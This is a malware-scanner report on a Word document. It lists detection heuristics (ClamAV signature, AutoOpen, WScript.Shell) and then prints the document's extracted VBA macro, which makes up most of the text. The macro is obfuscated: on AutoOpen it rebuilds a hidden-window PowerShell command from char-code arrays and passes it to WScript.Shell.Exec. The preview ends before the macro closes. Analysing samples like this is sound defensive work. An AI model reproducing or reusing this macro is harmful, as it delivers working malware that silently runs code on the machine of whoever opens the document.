MALICIOUS
Risk Score: 288
Heuristics (6)
- ClamAV: Doc.Malware.Sagent-6951618-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Sagent-6951618-0
- VBA project inside OOXML [medium, 4 related findings] OOXML_VBA: Document contains a VBA project; VBA macros present
- WScript.Shell usage [critical] OLE_VBA_WSCRIPT: WScript.Shell usage. Matched line in script:
  CreateObject("WScript.Shell").Exec vyzwggj
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
  CreateObject("WScript.Shell").Exec vyzwggj
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low] OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script:
  Sub AutoOpen()
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 24362 bytes |

SHA-256: 422a97a3eb6498871c7c97f81d6426da985dfa19e23b72609a0d7b1471becfd6

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Function c(a)
If fyuxxg < 0 Then
b = a + 375
Else
b = a - 375
End If
iadfvfg = 8444
vhgveyy = -42305
c = Chr(b)
End Function
Sub tgyc(a, vyzwggj)
For Each x In a
If Len(x) Then
vyzwggj = vyzwggj + Replace(c(x), "tuetfg", "vaah")
End If
Next
End Sub
Sub AutoOpen()
csebdi = -49026
axtx = -65396
vixfea = -55187
vyzwggj = ""
bfibygd = Array(487, 486)
tgyc bfibygd, vyzwggj
uawf = Array(494, 476, 489, 490, 479, 476, 483, 483, 407)
tgyc uawf, vyzwggj
abcaydg = Array(420, 462, 480, 485, 475, 486, 494, 458, 491, 496, 483, 476)
tgyc abcaydg, vyzwggj
ughw = Array(407, 447, 480, 475, 475, 476, 485, 407)
tgyc ughw, vyzwggj
wdeuu = Array(420, 442, 486, 484, 484, 472, 485)
tgyc wdeuu, vyzwggj
vzbgv = Array(475)
tgyc vzbgv, vyzwggj
vtyzd = Array(407, 411, 472, 436)
tgyc vtyzd, vyzwggj
gufe = Array(414, 414, 434)
tgyc gufe, vyzwggj
jsdfjs = Array(424, 423, 428, 419, 424, 423, 425, 419, 427, 423, 419, 426)
tgyc jsdfjs, vyzwggj
bezsh = Array(425)
tgyc bezsh, vyzwggj
bsyiv = Array(419, 427, 423, 419, 427, 423)
tgyc bsyiv, vyzwggj
ewjvtu = Array(419)
tgyc ewjvtu, vyzwggj
sudubj = Array(430, 424, 419, 424)
tgyc sudubj, vyzwggj
bfehy = Array(423, 424, 419, 424, 424, 429, 419)
tgyc bfehy, vyzwggj
udiyaht = Array(427, 428, 419, 431, 428, 419, 430, 426)
tgyc udiyaht, vyzwggj
gdfy = Array(419, 429, 430, 419, 424, 424, 430, 419, 424, 423, 431, 419, 424, 424, 429)
tgyc gdfy, vyzwggj
jxvxfw = Array(419, 424, 424, 430, 419, 424, 424, 427, 419, 424, 423, 424, 419, 427)
tgyc jxvxfw, vyzwggj
tcxzu = Array(424, 419, 427, 429, 419, 430, 431, 419, 432)
tgyc tcxzu, vyzwggj
gvefgu = Array(430, 419, 424, 423)
tgyc gvefgu, vyzwggj
eyiwfhw = Array(432)
tgyc eyiwfhw, vyzwggj
ijxjwu = Array(419, 424, 423, 424, 419, 426, 425, 419)
tgyc ijxjwu, vyzwggj
hviabf = Array(427, 428, 419)
tgyc hviabf, vyzwggj
ubaiyf = Array(424, 423)
tgyc ubaiyf, vyzwggj
utby = Array(432, 419, 432, 430)
tgyc utby, vyzwggj
ehttxeb = Array(419, 424)
tgyc ehttxeb, vyzwggj
bzdv = Array(424, 429, 419, 432, 432, 419, 424, 423, 427, 419, 426)
tgyc bzdv, vyzwggj
vefw = Array(425)
tgyc vefw, vyzwggj
xcfeztb = Array(419, 426)
tgyc xcfeztb, vyzwggj
uxcv = Array(432, 419, 431, 425)
tgyc uxcv, vyzwggj
bjuwh = Array(419)
tgyc bjuwh, vyzwggj
fbhcyz = Array(431, 428)
tgyc fbhcyz, vyzwggj
gyfys = Array(419, 424, 425, 427, 419, 431, 428, 419, 429, 428, 419, 424, 425, 427, 419, 429, 429, 419, 431, 432, 419, 424, 425)
tgyc gyfys, vyzwggj
aigsje = Array(427, 419, 429, 430)
tgyc aigsje, vyzwggj
iadthaw = Array(419, 430, 431, 419, 426, 432, 419)
tgyc iadthaw, vyzwggj
bebexgf = Array(427, 424, 419, 426, 425, 419, 427, 428)
tgyc bebexgf, vyzwggj
jdxcaaj = Array(419, 424, 424)
tgyc jdxcaaj, vyzwggj
sdtwyx = Array(424, 419, 424, 424, 427, 419, 426, 425, 419, 427, 423, 419, 427, 423, 419, 430, 424)
tgyc sdtwyx, vyzwggj
whcyc = Array(419)
tgyc whcyc, vyzwggj
aayvcjv = Array(424)
tgyc aayvcjv, vyzwggj
dieexgh = Array(423, 424)
tgyc dieexgh, vyzwggj
viddta = Array(419)
tgyc viddta, vyzwggj
sfcgxdw = Array(424, 424, 429, 419, 427, 428)
tgyc sfcgxdw, vyzwggj
tzgjce = Array(419, 431, 430, 419)
tgyc tzgjce, vyzwggj
ighgvdh = Array(424, 423, 432, 419, 424, 423, 428, 419, 430, 432, 419, 432, 431, 419, 424, 423, 429)
tgyc ighgvdh, vyzwggj
hwsi = Array(419, 424, 423, 424, 419, 432, 432, 419, 424, 424, 429)
tgyc hwsi, vyzwggj
zxcci = Array(419)
tgyc zxcci, vyzwggj
hjbwb = Array(426, 425, 419, 427, 428, 419, 432, 432, 419, 424)
tgyc hjbwb, vyzwggj
vszw = Array(423, 431, 419, 432, 430, 419, 424)
tgyc vszw, vyzwggj
hjywyue = Array(424, 428, 419, 424, 424)
tgyc hjywyue, vyzwggj
cevf = Array(428, 419, 426, 425, 419, 431, 430, 419, 424, 423)
tgyc cevf, vyzwggj
eyvhybu = Array(428, 419)
tgyc eyvhybu, vyzwggj
ewtzc = Array(424, 424, 423)
tgyc ewtzc, vyzwggj
hfjhea = Array(419, 428, 424, 419, 428, 423, 419, 432, 428)
tgyc hfjhea, vyzwggj
ibby = Array(419, 429, 430, 419, 424)
tgyc ibby, vyzwggj
zice = Array(424, 424)
tgyc zice, vyzwggj
hfgi = Array(419, 424, 423, 432)
tgyc hfgi, vyzwggj
ydwhxj = Array(419, 424, 424, 425, 419, 424, 424, 430, 419, 424)
tgyc ydwhxj, vyzwggj
sdyxvz = Array(424, 429, 419, 424, 423, 424, 419)
tgyc sdyxvz, vyzwggj
csbc = Array(424, 424, 427, 419)
tgyc csbc, vyzwggj
exebaa = Array(431)
tgyc exebaa, vyzwggj
yvbs = Array(426, 419, 424, 425, 424, 419, 424, 424)
tgyc yvbs, vyzwggj
ewyt = Array(428, 419, 424, 424, 429, 419, 424, 423, 424, 419, 424, 423, 432, 419, 426, 425, 419, 427, 428)
tgyc ewyt, vyzwggj
eauzhb = Array(419, 431, 423, 419, 424)
tgyc eauzhb, vyzwggj
iayfbzx = Array(424, 427, 419, 424, 424, 424, 419)
tgyc iayfbzx, vyzwggj
vwuys = Array(424, 424, 425, 419)
tgyc vwuys, vyzwggj
ichhvzt = Array(424)
tgyc ichhvzt, vyzwggj
etga = Array(423, 424, 419, 424, 424, 427, 419)
tgyc etga, vyzwggj
hudtt = Array(424, 424)
tgyc hudtt, vyzwggj
sthwg = Array(429, 419, 424, 425, 424)
tgyc sthwg, vyzwggj
dhauv = Array(419, 426, 425, 419, 430, 430, 419, 424, 424)
tgyc dhauv, vyzwggj
hdxds = Array(424, 419, 424, 423)
tgyc hdxds, vyzwggj
eetd = Array(423, 419, 424, 423, 424, 419, 424)
tgyc eetd, vyzwggj
ugixhix = Array(423, 431, 419, 427, 424, 419, 427, 429, 419, 430, 430, 419, 424, 424)
tgyc ugixhix, vyzwggj
faytcfv = Array(424)
tgyc faytcfv, vyzwggj
tyuiev = Array(419, 424, 423, 423, 419, 424, 423, 424)
tgyc tyuiev, vyzwggj
sucefg = Array(419, 424, 423, 431, 419, 426, 425, 419)
tgyc sucefg, vyzwggj
xiaftiz = Array(427)
tgyc xiaftiz, vyzwggj
yjcz = Array(428, 419, 424, 423, 432, 419, 432, 430, 419)
tgyc yjcz, vyzwggj
hdejad = Array(424, 424, 429)
tgyc hdejad, vyzwggj
jeca = Array(419, 432)
tgyc jeca, vyzwggj
xwyv = Array(432, 419, 424)
tgyc xwyv, vyzwggj
ewtd = Array(423, 427, 419, 426)
tgyc ewtd, vyzwggj
vxgawjh = Array(425, 419, 426)
tgyc vxgawjh, vyzwggj
axbh = Array(432, 419, 431)
tgyc axbh, vyzwggj
davbdua = Array(429, 419)
tgyc davbdua, vyzwggj
hcxa = Array(424, 423, 428, 419, 424, 424, 427, 419, 424, 424, 429)
tgyc hcxa, vyzwggj
gbuvitv = Array(419)
tgyc gbuvitv, vyzwggj
gixh = Array(424, 424, 430, 419, 432, 430, 419, 424, 423, 431, 419, 429, 429, 419, 424)
tgyc gixh, vyzwggj
vcdui = Array(424, 424, 419, 424, 425, 423, 419, 424)
tgyc vcdui, vyzwggj
efghdw = Array(425, 427, 419, 431)
tgyc efghdw, vyzwggj
zucx = Array(429, 419)
tgyc zucx, vyzwggj
ttbvef = Array(430, 430, 419, 424, 424, 432, 419, 432, 430, 419, 424, 424, 427, 419, 424)
tgyc ttbvef, vyzwggj
bstcxy = Array(423, 424, 419, 424, 425, 427, 419, 430, 428, 419, 431, 429, 419, 430, 430, 419)
tgyc bstcxy, vyzwggj
gxbtxzf = Array(426, 432, 419, 427)
tgyc gxbtxzf, vyzwggj
jzzyxfy = Array(424)
tgyc jzzyxfy, vyzwggj
ubgesix = Array(419, 426, 425, 419, 427, 424, 419)
tgyc ubgesix, vyzwggj
dfjwxy = Array(424)
tgyc dfjwxy, vyzwggj
djda = Array(425, 426, 419, 426, 425, 419, 424)
tgyc djda, vyzwggj
taeeh = Array(423, 424, 419, 424)
tgyc taeeh, vyzwggj
czfjj = Array(425, 423, 419, 424, 423, 428)
tgyc czfjj, vyzwggj
dtax = Array(419)
tgyc dtax, vyzwggj
wucv = Array(424, 424, 429)
tgyc wucv, vyzwggj
afuygs = Array(419)
tgyc afuygs, vyzwggj
catgfx = Array(428, 432, 419, 426, 425, 419, 424, 425, 428)
tgyc catgfx, vyzwggj
gvxxie = Array(419, 428, 432, 419)
tgyc gvxxie, vyzwggj
gbjieid = Array(426, 429, 419, 424, 424, 429, 419, 424, 424)
tgyc gbjieid, vyzwggj
ztyz = Array(432, 419, 432, 432, 419, 432, 431, 419, 424)
tgyc ztyz, vyzwggj
wvag = Array(424, 430, 419, 424)
tgyc wvag, vyzwggj
fszsia = Array(423)
tgyc fszsia, vyzwggj
utvsi = Array(425)
tgyc utvsi, vyzwggj
jsbwg = Array(419, 426)
tgyc jsbwg, vyzwggj
huiyg = Array(425, 419, 429, 424, 419, 426, 425, 419, 432, 424)
tgyc huiyg, vyzwggj
ftyi = Array(419, 431, 426)
tgyc ftyi, vyzwggj
dvvt = Array(419, 424, 425)
tgyc dvvt, vyzwggj
zgjcuuv = Array(424)
tgyc zgjcuuv, vyzwggj
ghttjyd = Array(419, 424, 424, 428, 419, 424)
tgyc ghttjyd, vyzwggj
jvdccvj = Array(424, 429, 419, 424, 423, 424, 419, 424, 423, 432, 419, 427, 429, 419, 430, 426, 419, 430)
tgyc jvdccvj, vyzwggj
hfgv = Array(432, 419, 427, 429)
tgyc hfgv, vyzwggj
bgda = Array(419, 431, 423, 419, 432, 430, 419, 424, 424, 429)
tgyc bgda, vyzwggj
xectvw = Array(419, 424, 423, 427, 419, 432, 426, 419, 428, 431, 419, 428, 431, 419, 430, 424, 419, 424)
tgyc xectvw, vyzwggj
xabccys = Array(423)
tgyc xabccys, vyzwggj
dcavu = Array(424, 419, 424)
tgyc dcavu, vyzwggj
uectf = Array(424, 429, 419, 431, 427, 419, 424, 423, 424, 419, 424, 423, 432, 419, 424, 424, 425, 419, 431, 423, 419, 432, 430, 419, 424, 424, 429, 419)
tgyc uectf, vyzwggj
fyss = Array(424, 423, 427, 419, 427, 423, 419, 427, 424)
tgyc fyss, vyzwggj
ywybva = Array(419)
tgyc ywybva, vyzwggj
agabxj = Array(428, 432, 419, 426, 429, 419, 424, 423)
tgyc agabxj, vyzwggj
sveva = Array(428, 419, 424)
tgyc sveva, vyzwggj
tgyjbg = Array(423, 426)
tgyc tgyjbg, vyzwggj
fthgu = Array(419)
tgyc fthgu, vyzwggj
txavef = Array(424, 424, 432, 419, 424, 423)
tgyc txavef, vyzwggj
gvufujx = Array(427, 419, 424, 425, 424, 419, 424, 423, 424, 419, 426, 425, 419, 429)
tgyc gvufujx, vyzwggj
ecxbbft = Array(424)
tgyc ecxbbft, vyzwggj
aueawy = Array(419, 426)
tgyc aueawy, vyzwggj
abzs = Array(425, 419, 430)
tgyc abzs, vyzwggj
wwhi = Array(427, 419, 424, 424, 424, 419)
tgyc wwhi, vyzwggj
ijdwu = Array(424, 423)
tgyc ijdwu, vyzwggj
acgwcdy = Array(428, 419, 424, 424, 423, 419, 427, 428, 419)
tgyc acgwcdy, vyzwggj
evytisj = Array(431, 423, 419, 432, 430, 419, 424, 424, 429, 419, 424, 423, 427)
tgyc evytisj, vyzwggj
eybtbx = Array(419)
tgyc eybtbx, vyzwggj
vbfdui = Array(426, 425, 419, 426, 429)
tgyc vbfdui, vyzwggj
cstdhu = Array(419, 424, 424, 429, 419, 424, 424, 432, 419, 432, 432, 419, 432, 431, 419, 424, 424, 430, 419, 424)
tgyc cstdhu, vyzwggj
jeuifsy = Array(423, 425, 419)
tgyc jeuifsy, vyzwggj
xgivg = Array(426, 425, 419, 426, 432, 419, 429, 431, 419, 424, 423)
tgyc xgivg, vyzwggj
wjwsta = Array(430)
tgyc wjwsta, vyzwggj
fvetuf = Array(419, 424)
tgyc fvetuf, vyzwggj
eate = Array(423, 424, 419, 427)
tgyc eate, vyzwggj
gvxshv = Array(429)
tgyc gvxshv, vyzwggj
wegxde = Array(419, 424, 423)
tgyc wegxde, vyzwggj
wsai = Array(424)
tgyc wsai, vyzwggj
dwsbx = Array(419)
tgyc dwsbx, vyzwggj
ztszbu = Array(424, 425)
tgyc ztszbu, vyzwggj
ceusibt = Array(423, 419, 424, 423, 424, 419, 426, 432, 419, 428)
tgyc ceusibt, vyzwggj
hvbc = Array(432)
tgyc hvbc, vyzwggj
dcvwjib = Array(419, 426, 429, 419, 424)
tgyc dcvwjib, vyzwggj
zassv = Array(423, 426, 419, 424, 423, 425, 419, 424, 425)
tgyc zassv, vyzwggj
wgsby = Array(424, 419)
tgyc wgsby, vyzwggj
wefg = Array(432, 432)
tgyc wefg, vyzwggj
idivij = Array(419, 432, 431, 419)
tgyc idivij, vyzwggj
ejhtif = Array(424, 423, 428, 419, 426, 425, 419)
tgyc ejhtif, vyzwggj
vbjf = Array(429, 424, 419, 426, 425)
tgyc vbjf, vyzwggj
vzbd = Array(419, 426, 432)
tgyc vzbd, vyzwggj
ibvft = Array(419, 424, 423, 427)
tgyc ibvft, vyzwggj
zcxb = Array(419, 424)
tgyc zcxb, vyzwggj
vieguas = Array(424)
tgyc vieguas, vyzwggj
ctsvhu = Array(429, 419)
tgyc ctsvhu, vyzwggj
awxwwj = Array(424, 424, 429, 419, 424)
tgyc awxwwj, vyzwggj
afwwb = Array(424, 425, 419, 428)
tgyc afwwb, vyzwggj
zfhcshw = Array(431, 419, 427, 430, 419, 427)
tgyc zfhcshw, vyzwggj
fatugfu = Array(430, 419)
tgyc fatugfu, vyzwggj
xyahigg = Array(424, 424, 432)
tgyc xyahigg, vyzwggj
hhwvewz = Array(419, 424, 424, 432)
tgyc hhwvewz, vyzwggj
jtxdbgf = Array(419)
tgyc jtxdbgf, vyzwggj
haes = Array(424)
tgyc haes, vyzwggj
ziey = Array(424, 428, 419, 427, 429, 419, 424, 423, 424, 419, 424, 423, 432, 419, 424, 423, 424, 419, 424, 424, 427, 419)
tgyc ziey, vyzwggj
xhsestj = Array(432, 430, 419, 424, 423, 431, 419, 424, 423, 423, 419, 424, 424, 428, 419, 424, 424)
tgyc xhsestj, vyzwggj
ztxh = Array(430, 419, 424, 424)
tgyc ztxh, vyzwggj
vwds = Array(427, 419, 424, 423, 425)
tgyc vwds, vyzwggj
txwbd = Array(419, 424, 424, 428, 419)
tgyc txwbd, vyzwggj
yuwf = Array(432, 432, 419, 424, 423, 428, 419, 424, 423, 424)
tgyc yuwf, vyzwggj
xvvwfsu = Array(419, 424)
tgyc xvvwfsu, vyzwggj
ssas = Array(424, 423)
tgyc ssas, vyzwggj
vsiti = Array(419, 432, 432, 419, 424, 423)
tgyc vsiti, vyzwggj
bwca = Array(424, 419, 424, 424, 428, 419, 427)
tgyc bwca, vyzwggj
zuau = Array(429, 419)
tgyc zuau, vyzwggj
byhdf = Array(424)
tgyc byhdf, vyzwggj
dutte = Array(424)
tgyc dutte, vyzwggj
ugjxs = Array(424, 419, 424, 424, 427, 419, 424, 423, 426, 419)
tgyc ugjxs, vyzwggj
cifzdzs = Array(427)
tgyc cifzdzs, vyzwggj
bcwha = Array(430, 419, 432, 430, 419, 424, 424)
tgyc bcwha, vyzwggj
iwvc = Array(425, 419, 424, 423, 428, 419, 429, 426, 419, 424, 424)
tgyc iwvc, vyzwggj
htthf = Array(428, 419, 424, 425, 423, 419, 424, 423, 428, 419, 424, 423, 424, 419, 424, 425, 423, 419, 426, 432, 419, 428, 432, 419, 426, 429, 419, 424, 423)
tgyc htthf, vyzwggj
cbgey = Array(424)
tgyc cbgey, vyzwggj
xeuej = Array(419, 424, 423, 427, 419, 424, 423, 423, 419)
tgyc xeuej, vyzwggj
dwthxfy = Array(424, 424, 432)
tgyc dwthxfy, vyzwggj
edysw = Array(419, 426, 425, 419, 429, 424, 419, 426, 425, 419, 430)
tgyc edysw, vyzwggj
gzgce = Array(427, 419, 424, 424, 424, 419, 424, 423)
tgyc gzgce, vyzwggj
fscxh = Array(428, 419, 424)
tgyc fscxh, vyzwggj
dssvbj = Array(424, 423, 419, 427, 428, 419, 431, 423, 419, 432, 430, 419, 424)
tgyc dssvbj, vyzwggj
gaibcat = Array(424, 429)
tgyc gaibcat, vyzwggj
dawg = Array(419, 424, 423)
tgyc dawg, vyzwggj
sibw = Array(427, 419, 426, 425, 419, 426, 429, 419, 424)
tgyc sibw, vyzwggj
ijti = Array(424, 429, 419, 424, 424, 432, 419, 432, 432, 419, 432, 431, 419, 424, 424, 430, 419, 424, 423, 425, 419)
tgyc ijti, vyzwggj
gfyfb = Array(426)
tgyc gfyfb, vyzwggj
vuzus = Array(425, 419, 426, 432, 419, 431, 426, 419, 424, 423, 424, 419, 432, 430, 419, 424, 424)
tgyc vuzus, vyzwggj
vzheyde = Array(427, 419)
tgyc vzheyde, vyzwggj
uzwzca = Array(432, 432, 419, 424, 423)
tgyc uzwzca, vyzwggj
gicfwuz = Array(427, 419)
tgyc gicfwuz, vyzwggj
titiub = Array(430, 426, 419, 428, 424, 419)
tgyc titiub, vyzwggj
iyuy = Array(428, 423, 419, 427, 429, 419)
tgyc iyuy, vyzwggj
utit = Array(424, 423, 429, 419, 424, 424, 428, 419, 426, 432, 419, 428, 432)
tgyc utit, vyzwggj
hjtzgva = Array(419, 426, 429, 419, 424, 424, 432, 419)
tgyc hjtzgva, vyzwggj
hevcidw = Array(432, 431, 419)
tgyc hevcidw, vyzwggj
bhhbg = Array(424, 424, 429, 419, 424, 425, 423)
tgyc bhhbg, vyzwggj
xtgfsyy = Array(419, 424, 425, 423, 419, 424, 424)
tgyc xtgfsyy, vyzwggj
axhzeht = Array(430, 419, 426, 425, 419, 429, 424, 419, 426)
tgyc axhzeht, vyzwggj
axtjg = Array(425, 419, 426)
tgyc axtjg, vyzwggj
xffj = Array(432, 419)
tgyc xffj, vyzwggj
xesxb = Array(424, 423, 427, 419, 424, 424, 429, 419, 424, 424, 429, 419, 424, 424, 425, 419, 428)
tgyc xesxb, vyzwggj
uzicfc = Array(431, 419, 427, 430, 419, 427, 430)
tgyc uzicfc, vyzwggj
wdefa = Array(419, 424, 423, 428, 419, 424, 423)
tgyc wdefa, vyzwggj
syushh = Array(432, 419, 424, 423, 426, 419, 427)
tgyc syushh, vyzwggj
sjabie = Array(429, 419, 424)
tgyc sjabie, vyzwggj
wuvasb = Array(423, 424)
tgyc wuvasb, vyzwggj
davi = Array(419, 424, 424, 428, 419, 424, 424, 428, 419, 427, 428, 419, 424, 423)
tgyc davi, vyzwggj
dujvxb = Array(428, 419, 424, 423, 423, 419)
tgyc dujvxb, vyzwggj
gzftsx = Array(427, 429, 419, 432, 432)
tgyc gzftsx, vyzwggj
jhuaix = Array(419, 424, 424, 424, 419, 424)
tgyc jhuaix, vyzwggj
jhaii = Array(423, 432, 419)
tgyc jhaii, vyzwggj
yzdgauw = Array(427, 430, 419, 424, 423, 431)
tgyc yzdgauw, vyzwggj
udstt = Array(419, 428)
tgyc udstt, vyzwggj
hsayb = Array(423, 419, 427, 429, 419, 424)
tgyc hsayb, vyzwggj
heitxbc = Array(424, 425, 419, 424, 423, 427, 419, 424, 424, 425, 419)
tgyc heitxbc, vyzwggj
fzvyx = Array(429, 426, 419, 424, 424, 431, 419, 424, 423, 428, 419, 424, 423, 423)
tgyc fzvyx, vyzwggj
zziji = Array(419, 429, 424, 419, 424, 425, 425)
tgyc zziji, vyzwggj
zeivzjf = Array(419)
tgyc zeivzjf, vyzwggj
fysvfs = Array(432, 430, 419)
tgyc fysvfs, vyzwggj
gbbsgz = Array(424, 424, 429, 419, 427)
tgyc gbbsgz, vyzwggj
ajad = Array(432, 419, 426, 432, 419)
tgyc ajad, vyzwggj
efasfha = Array(428, 432)
tgyc efasfha, vyzwggj
txji = Array(419, 424, 424, 429)
tgyc txji, vyzwggj
jyvfjew = Array(419, 424)
tgyc jyvfjew, vyzwggj
hvbzst = Array(424)
tgyc hvbzst, vyzwggj
zwsd = Array(427, 419, 424, 425, 424, 419, 424, 425, 426, 419, 427, 423, 419, 430, 431, 419, 424)
tgyc zwsd, vyzwggj
iwfhj = Array(423, 424, 419, 424, 424, 432, 419, 427, 428)
tgyc iwfhj, vyzwggj
fexciu = Array(419, 430, 432, 419, 432, 431, 419, 424, 423, 429)
tgyc fexciu, vyzwggj
txehbff = Array(419, 424, 423, 424, 419, 432)
tgyc txehbff, vyzwggj
sayjjez = Array(432)
tgyc sayjjez, vyzwggj
gwatg = Array(419, 424)
tgyc gwatg, vyzwggj
vuewc = Array(424, 429, 419, 426, 425, 419, 430)
tgyc vuewc, vyzwggj
ujut = Array(431, 419, 424, 423)
tgyc ujut, vyzwggj
sgdfy = Array(424)
tgyc sgdfy, vyzwggj
fgzy = Array(419, 424)
tgyc fgzy, vyzwggj
jbgxdzy = Array(424, 429)
tgyc jbgxdzy, vyzwggj
awzvfh = Array(419)
tgyc awzvfh, vyzwggj
gxiwzc = Array(427, 429, 419, 431, 430, 419, 424, 423, 424, 419, 432, 431, 419, 429, 430, 419, 424, 423, 431, 419, 424, 423, 428)
tgyc gxiwzc, vyzwggj
zawjtdg = Array(419, 424, 423, 424, 419, 424, 424, 423, 419, 424, 424, 429, 419, 427, 424)
tgyc zawjtdg, vyzwggj
hiiyic = Array(419, 427, 429, 419, 429, 431, 419, 424)
tgyc hiiyic, vyzwggj
yffd = Array(424, 424, 419, 424, 424, 432, 419, 424, 424, 423, 419, 424, 423, 431, 419, 424)
tgyc yffd, vyzwggj
uwigvx = Array(424, 424, 419, 432)
tgyc uwigvx, vyzwggj
gugz = Array(430)
tgyc gugz, vyzwggj
gcctv = Array(419, 424, 423)
tgyc gcctv, vyzwggj
cuxjgtg = Array(423, 419, 430, 423, 419, 424, 423)
tgyc cuxjgtg, vyzwggj
eehxcb = Array(428, 419)
tgyc eehxcb, vyzwggj
zufhz = Array(424)
tgyc zufhz, vyzwggj
eyufvze = Array(423, 431, 419)
tgyc eyufvze, vyzwggj
ucctex = Array(424, 423, 424, 419, 427, 423, 419)
tgyc ucctex, vyzwggj
cjzusd = Array(426, 429, 419, 424, 424, 432, 419, 432)
tgyc cjzusd, vyzwggj
zbfdf = Array(431)
tgyc zbfdf, vyzwggj
gfyjxcy = Array(419)
tgyc gfyjxcy, vyzwggj
jctdeg = Array(424, 424, 429, 419)
tgyc jctdeg, vyzwggj
bezwsh = Array(424, 425, 423, 419, 424, 425, 423, 419, 424, 424, 430, 419)
tgyc bezwsh, vyzwggj
xchch = Array(427, 427, 419, 426, 429, 419, 424, 423, 424, 419)
tgyc xchch, vyzwggj
heyvx = Array(424, 423, 427, 419, 424, 423, 423, 419, 424, 424, 432, 419, 427, 424, 419, 428, 432)
tgyc heyvx, vyzwggj
tehjhwt = Array(419, 431)
tgyc tehjhwt, vyzwggj
dawtchh = Array(426, 419, 424, 424, 429, 419, 432, 430, 419)
tgyc dawtchh, vyzwggj
zxaxhh = Array(424, 424, 427, 419, 424, 424, 429)
tgyc zxaxhh, vyzwggj
bxzy = Array(419, 427, 428, 419, 431, 423, 419, 424, 424, 427, 419, 424, 424, 424)
tgyc bxzy, vyzwggj
tyavtx = Array(419, 432)
tgyc tyavtx, vyzwggj
veexzd = Array(432, 419, 424)
tgyc veexzd, vyzwggj
iyietx = Array(423, 424, 419, 424, 424, 428, 419, 424)
tgyc iyietx, vyzwggj
dsudxf = Array(424, 428, 419)
tgyc dsudxf, vyzwggj
jygu = Array(426, 425)
tgyc jygu, vyzwggj
cbvxbaj = Array(419)
tgyc cbvxbaj, vyzwggj
wusa = Array(426)
tgyc wusa, vyzwggj
cfaxu = Array(429, 419)
tgyc cfaxu, vyzwggj
cszsscc = Array(424, 423, 424)
tgyc cszsscc, vyzwggj
xfdv = Array(419, 424, 423, 427, 419, 424, 423, 423, 419)
tgyc xfdv, vyzwggj
zzwsyia = Array(424, 424, 432, 419)
tgyc zzwsyia, vyzwggj
xjach = Array(428, 432, 419, 424, 425, 428)
tgyc xjach, vyzwggj
uvvby = Array(419)
tgyc uvvby, vyzwggj
dtyyw = Array(432, 432, 419, 432, 430, 419, 424, 424, 429, 419, 432)
tgyc dtyyw, vyzwggj
whebyzj = Array(432, 419, 424)
tgyc whebyzj, vyzwggj
sidgwes = Array(423)
tgyc sidgwes, vyzwggj
bhzbtf = Array(427, 419, 424)
tgyc bhzbtf, vyzwggj
wsavy = Array(425, 426, 419, 424, 425, 428)
tgyc wsavy, vyzwggj
zzdgcxc = Array(419, 428, 432, 419, 424, 424, 429, 419)
tgyc zzdgcxc, vyzwggj
bizgv = Array(424, 424, 427, 419, 424)
tgyc bizgv, vyzwggj
vyxgjj = Array(425)
tgyc vyxgjj, vyzwggj
xduszev = Array(424, 419, 424, 425, 426, 419, 427)
tgyc xduszev, vyzwggj
udjsx = Array(423, 419, 430, 431, 419, 424, 423, 424, 419, 424, 424)
tgyc udjsx, vyzwggj
utui = Array(432, 419, 427, 428, 419)
tgyc utui, vyzwggj
abyy = Array(430, 432)
tgyc abyy, vyzwggj
vubfjti = Array(419, 432)
tgyc vubfjti, vyzwggj
gzuy = Array(431, 419, 424, 423, 429, 419, 424, 423, 424)
tgyc gzuy, vyzwggj
ustged = Array(419, 432, 432)
tgyc ustged, vyzwggj
wyghe = Array(419)
tgyc wyghe, vyzwggj
czjy = Array(424, 424, 429, 419)
tgyc czjy, vyzwggj
uuecy = Array(426, 425, 419, 430, 431, 419)
tgyc uuecy, vyzwggj
ezfatz = Array(424, 423, 424)
tgyc ezfatz, vyzwggj
jxdsfh = Array(419, 424)
tgyc jxdsfh, vyzwggj
igcw = Array(424, 429, 419, 427, 429, 419, 431, 430, 419, 424, 423, 424, 419, 432, 431, 419, 429, 430, 419, 424, 423, 431, 419, 424, 423, 428, 419, 424, 423)
tgyc igcw, vyzwggj
xxuewh = Array(424, 419, 424, 424, 423, 419, 424, 424, 429, 419, 427, 424, 419, 427, 429, 419, 429, 431, 419, 424, 424, 424, 419, 424, 424, 432)
tgyc xxuewh, vyzwggj
hwgdtu = Array(419)
tgyc hwgdtu, vyzwggj
gcgyf = Array(424, 424)
tgyc gcgyf, vyzwggj
zhbjas = Array(423, 419, 424, 423, 431, 419, 424, 424, 424)
tgyc zhbjas, vyzwggj
iueuthc = Array(419, 432, 430, 419, 424, 423, 423, 419)
tgyc iueuthc, vyzwggj
yhdajxy = Array(430, 423, 419, 424, 423, 428, 419, 424, 423, 431, 419, 424)
tgyc yhdajxy, vyzwggj
cscybb = Array(423, 424, 419, 427, 423, 419, 426, 429, 419, 424, 423)
tgyc cscybb, vyzwggj
udtasx = Array(426, 419, 424, 423, 425, 419, 424, 425, 424, 419, 432, 432, 419, 432, 431, 419, 424)
tgyc udtasx, vyzwggj
tvwaau = Array(423, 428, 419, 427, 427, 419, 426, 429, 419, 424, 423, 428)
tgyc tvwaau, vyzwggj
eixdt = Array(419, 424, 423, 426)
tgyc eixdt, vyzwggj
ytvtjg = Array(419, 424, 424, 432, 419, 424, 423, 427)
tgyc ytvtjg, vyzwggj
xgvjaa = Array(419, 424, 425, 424, 419, 424)
tgyc xgvjaa, vyzwggj
cbtsb = Array(423, 424, 419, 427)
tgyc cbtsb, vyzwggj
jwjs = Array(424, 419, 428, 432)
tgyc jwjs, vyzwggj
uttfxw = Array(419, 431)
tgyc uttfxw, vyzwggj
